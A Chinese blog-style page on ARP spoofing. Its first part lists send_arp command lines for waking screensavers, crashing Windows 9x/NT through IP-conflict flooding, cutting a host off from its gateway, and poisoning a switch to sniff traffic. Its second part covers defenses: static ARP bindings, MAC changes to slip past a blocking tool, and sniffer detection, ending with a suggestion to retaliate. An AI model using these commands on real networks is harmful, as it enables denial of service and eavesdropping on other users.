网上关于ARP的资料已经很多了,就不用我都说了。
用某一位高手的话来说,“我们能做的事情很多,唯一受
限制的是我们的创造力和想象力”。
ARP也是如此。
以下讨论的机子有:

一个要攻击的机子:10.5.4.178
硬件地址:52:54:4C:98:EE:2F
我的机子: :10.5.3.69
硬件地址:52:54:4C:98:ED:C5
网关: 10.5.0.3
硬件地址:00:90:26:3D:0C:F3
一台交换机另一端口的机子:10.5.3.3
硬件地址:52:54:4C:98:ED:F7
一:   用ARP破WINDOWS的屏保
原理:利用IP冲突的级别比屏保高,当有冲突时,就会
跳出屏保。
关键:     ARP包的数量适当。
[root@sztcww tools]# ./send_arp 10.5.4.178 00:90:26:3D:0C:F3 /
10.5.4.178 52:54:4C:98:EE:2F 40

二:用ARP导致IP冲突,死机
原理:WINDOWS 9X,NT4在处理IP冲突时,处理不过来,导致死机。
注: 对WINDOWS 2K,LINUX相当于flooding,只是比一般的FLOODING
有效的多.对LINUX,明显系统被拖慢。
[root@sztcww tools]# ./send_arp 10.5.4.178 00:90:26:3D:0C:F3 /
10.5.4.178 52:54:4C:98:EE:2F 999999999

三:用ARP欺骗网关,可导致局域网的某台机子出不了网关。
原理:             用ARP应答包去刷新对应着要使之出不去的机子。
[root@sztcww tools]# ./send_arp 10.5.4.178 52:54:4C:98:EE:22 /
10.5.4.178 00:90:26:3D:0C:F3 1
注意:如果单单如上的命令,大概只能有效几秒钟,网关机子里的ARP
高速缓存会被被攻击的机子正确刷新,于是只要...

四:用ARP欺骗交换机,可监听到交换机另一端的机子。
可能需要修改一下send_arp.C , 构造如下的数据包。
ethhdr
srchw:52:54:4C:98:ED:F7--->dsthw:FF:FF:FF:FF:FF:FF proto:806H
arphdr
hwtype:1 protol:800H hw_size:6 pro_size:4 op:1
s_ha:52:54:4C:98:ED:F7 s_ip:10.5.3.3
d_ha:00:00:00:00:00:00 d_ip:10.5.3.3
然后就可以sniffer了。
原理:
交换机是具有记忆MAC地址功能的 , 它维护一张MAC地址和它的口号表
所以你可以先来个ARP 欺骗, 然后就可以监听了
不过需要指出 , 欺骗以后, 同一个MAC地址就有两个端口号
yuange说,“这样其实就是一个竞争问题。”
好象ARP 以后, 对整个网络会有点影响, 不过我不敢确定
既然是竞争 , 所以监听也只能监听一部分, 不象同一HUB下的监听。
对被监听者会有影响,因为他掉了一部分数据。
当然还有其他一些应用,需要其他技术的配合。

解决方法:
方法一:
网段A(192.168.0.x) 通过------> 网关服务器(192.168.0.1;192.168.10.1) -----〉
和网段B(192.168.10.x)通信。
假设架设 CS服务器在 网段B 192.168.10.88 机器上,
现在 在 网关服务器上架着一个端口转发程序(有很多的自己找)
比如定义 网关服务器的27015端口 转发 指定 192.168.0.10.88 的27015端口
现在在网段A(192.168.0.x) 的玩家只要的 互联网游戏地址处加入 192.168.0.1:27015 就可以找到
192.168.10.88 的CS服务器了
个人认为比较好的 办法是 把网段分开 , 在网关服务器上做端口转发服务
来达到 共享CS服务器等 功能,就可以解决了~
方法二:
捆绑MAC和IP地址 杜绝IP地址盗用现象
到代理服务器端让网络管理员把您上网的静态IP地址与所记录计算机的网卡地址进行捆绑。具体命令是:
  ARP -s 192.168.0.4 00-EO-4C-6C-08-75
  这样,就将您上网的静态IP地址192.168.0.4与网卡地址为00-EO-4C-6C-08-75的计算机绑定在一起了,即使别人盗用您的IP地址192.168.0.4也无法通过代理服务器上网。其中应注意的是此项命令仅在局域网中上网的代理服务器端有用,还要是静态IP地址,像一般的Modem拨号上网是动态IP地址就不起作用。接下来我们对各参数的功能作一些简单的介绍:

ARP -s - d - a
  -s——将相应的IP地址与物理地址的捆绑。
  -d——删除所给出的IP地址与物理地址的捆绑。
  -a——通过查询Arp协议表来显示IP地址和对应物理地址情况。
方法三:
网络执法官这个软件相信大家都听说过了。功能不错,可以禁止局域网任意机器连接网络。这个功能对网管来说的确不错。不过如果这个软件落到那些卑鄙小人的手里---那后果就不堪设想了。轻则把你封了上不了网,重则可以导致整个局域网瘫痪。。

废话不说了,切入正题吧。现在教大家两招轻松防范网络执法官!!
NO 0.1
首先呢,最稳妥的一个办法就是修改机器的MAC地址,只要把MAC地址改为别的,就可以欺骗过网络执法官,从而达到突破封锁的目的。下面是修改MAC地址的方法:

linux环境下:
需要用
#ifconfig eth0 down
先把网卡禁用
再用ifconfig eth0 hw ether 1234567890ab
这样就可以改成功了
要想永久改就这样
在/etc/rc.d/rc.local里加上这三句(也可以在/etc/init.d/network里加下面三行)
ifconfig eth0 down
ifconfig eth0 hw ether 1234567890ab
ifconfig eth0 up
另:
在win2000中改MAC地址的方法:
打开注册表编辑器,找到HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Class/{4D36E972-E325-11CE-BFC1-08002BE10318}子键,在该子键下的0000,0001,0002等分支中查找DriverDesc,在0000子键下天一个字符串项,命名为NetworkAddress,键值设为修改后的MAC地址,要求为连续的12个16进制数,如1234567890AB(注意位数要对!不能是000000000000,不能与别的机器重复)。然后在0000下的NDI/params中加一项名为NetworkAddress的子键,在该子键下添加名为defau

lt的字符串,键值为修改后的MAC地址,与上面的数值相同。在NetworkAddress的主键下继续添加命名为ParamDesc的字符串,其作用是制定NetworkAddress主键的描述,其值可为“MAC
地址”,这样以后打开网络属性,双击相应的网卡会发现有一个高级设置,其下坐在“MAC地址”的选项,在此修改MAC地址就可以了,修改后需重启。

Windows环境:
用dos,8139的可以改,用realtek的pg8139.exe,比如
是8139c网卡,就改写8139c.cfg文件,第一行就是网卡mac,想怎么改就怎么改
NO 0.2
另外一种方法,我没有试,一种设想,有条件的朋友帮忙试一下。
由于网络执法官的原理是通过ARP欺骗发给被攻击的电脑一个假的网关IP地址对应的MAC,使其找不到网关真正的MAC,那么我们可以自己修改IP->MAC的映射,使网络执法官ARP欺骗失效。具体做法如下:

在还没有被封锁的时候进入CMD执行如下命令
e:/>ping 192.168.9.1 (假设此地址位网关。)
Pinging 192.168.9.1 with 32 bytes of data:
Reply from 192.168.9.1: bytes=32 time<10ms TTL=64
Reply from 192.168.9.1: bytes=32 time<10ms TTL=64
Reply from 192.168.9.1: bytes=32 time<10ms TTL=64
Reply from 192.168.9.1: bytes=32 time<10ms TTL=64
Ping statistics for 192.168.9.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
e:/>arp -a
Interface: 192.168.9.1 on Interface 0x5000003
Internet Address Physical Address Type
192.168.9.1 00-0E-70-32-f1-02 dynamic
(上面的就是网关的MAC)
然后作这样一个批处理文件保存起来。。注意!!!地址要换为你自己的网关的IP和MAC
arp -s 192.168.9.1 00-0E-70-32-f1-02
然后呢,在你被封锁的时候,就执行这个批处理吧。
NO 0.3
如果解除了网络执法官的封锁可不可以查到使用网络执法官的人究竟是谁呢?答案是可以!(感谢zva提供方法)利用arpkiller的sniffer杀手扫描整个局域网IP段查找处在“混杂”(监听)模式下的计算机,应该就是他了!!!(注意,扫描的时候自己也处在混杂模式,自己不能算哦)

之后做什么呢?就不用我说了吧?哈哈,以毒攻毒,用网络执法官把她封了!

局域网攻击原理与防御相关推荐

  1. DDoS的攻击原理与防御方法

    DDoS的攻击原理与防御方法 不可不知DDoS的攻击原理与防御方法 DoS是Denial of Service的简写就是拒绝服务,而DDoS就是Distributed Denial of Servic ...

  2. 服务器安全:浏览器同源策略与跨域请求、XSS攻击原理及防御策略、如何防御CSRF攻击

    主要包括 浏览器同源策略与跨域请求 XSS攻击原理及防御策略 如何使用SpringSecurity防御CSRF攻击 CC/DDOS攻击与流量攻击 什么是SSL TLS HTTPS? 一.浏览器的同源策 ...

  3. Web 安全之 XSS 攻击原理/分类/防御 详解

    什么是 XSS 攻击? 全称 Cross-Site Scripting 跨站脚本攻击,简写为了避免和 CSS 冲突而改成 XSS 原理:通过在浏览器可输入的地方(比如评论栏.搜索栏.地址栏等)注入脚本 ...

  4. 服务器SYN洪水攻击原理和防御办法-SynAttackProtect保护机制

    服务器SYN洪水攻击原理和防御办法-SynAttackProtect保护机制 一.设置SynAttackProtect键值步骤 二.防止SYN洪水攻击修改项说明 三.特别注意 SYN洪水攻击是利用客户 ...

  5. CSRF攻击原理以及防御方法

    CSRF攻击原理以及防御方法 CSRF概念:CSRF跨站点请求伪造(Cross-Site Request Forgery),跟XSS攻击一样,存在巨大的危害性,你可以这样来理解: 攻击者盗用了你的身份 ...

  6. 不可不知 DDoS的攻击原理与防御方法(2)

    转自: http://tech.sina.com.cn/s/2006-07-17/09501040151.shtml DoS攻击.DDoS攻击和DRDoS攻击相信大家已经早有耳闻了吧!DoS是Deni ...

  7. ARP欺骗攻击原理及其防御

    一.概述 1.ARP协议 地址解析协议,将IP地址转换为对应的mac地址,属链路层协议 数据包分为: 请求包(广播):本机IP地址.mac地址+目标主机IP地址 应答包(单播):本机IP地址.mac地 ...

  8. 2020最全详解DDoS的攻击原理与防御方法

    DoS是Denial of Service的简写就是拒绝服务,而DDoS就是Distributed Denial of Service的简写就是分布式拒绝服务,而DRDoS就是Distributed ...

  9. CSRF攻击原理与防御方法

    目录 什么是CSRF CSRF与XSS的区别 CSRF是怎么攻击的 攻击原理 如何防范 1.验证请求来源,通过请求头的Referer或者Origin字段来判断来源. 2.生成随机的token,在请求的 ...

最新文章

  1. 字体在ppt中可以整体替换吗_干货,做PPT时这样选择字体,瞬间提升幻灯片档次,看完你就懂了...
  2. 向类脑芯片迈进!科学家制造出光基人工神经元网络芯片
  3. 定义指令时“控制器”,“链接”和“编译”函数之间的区别
  4. 批量ping工具fping
  5. Vue的v-for中列表项拖拽排序详细方法
  6. C/C++ 数据类型
  7. 注册了Stack Overflow
  8. Vue---vue-cli 中的proxyTable解决开发环境中的跨域问题
  9. HDU 4115 Eliminate the Conflict【2011 ACM Asia Chengdu Regional Problem E】
  10. dx10游戏测试软件,GPU评测:3DMark与DX10/11游戏评测
  11. 嵌入式和单片机的区别是什么
  12. 如何在 Windows 10/11 下通过命令卸载产品许可密钥
  13. [每日一氵] Python 训练过程中,如何优雅的保存loss
  14. iPhone导出网易云音乐本地音乐
  15. 苹果个人公司类型开发者账号申请(99美元)详解
  16. 获取文本文件编码与导出源代码
  17. 数据库可移植性重要吗?
  18. 毕设论文word撰写:如何实现公式居中,编号右对齐?其实非常简单!
  19. Android 应用详情查看
  20. 期货突破法进场是等突破K走完再进场还是突破瞬间就进场?

热门文章

  1. linux 开发板模拟u盘,linux 开发板(Linux USB Gadget) 模拟u盘
  2. 500元的早餐我欣然咽下,生活你是魔鬼么?
  3. 添加/删除Windows组件,点击没反应,DBC2000安装不了
  4. 神经网络预测彩票数据
  5. FinalRecovery(windows下数据恢复专家!个人强力推荐!)
  6. CATV光传输盒方案
  7. openSUSE 11.2 安装飞鸽传书 g2ipmsg
  8. 一雪被 AlphaGo 狠虐的“前耻”!14:1,这次人类终于赢了围棋 AI
  9. PyCharm专业版安装Bug解决(EXCEPTION_ACCESS_VIOLATION)
  10. 音频剪辑文件 audition3.0(英文破解)与audition(中文直接安装板)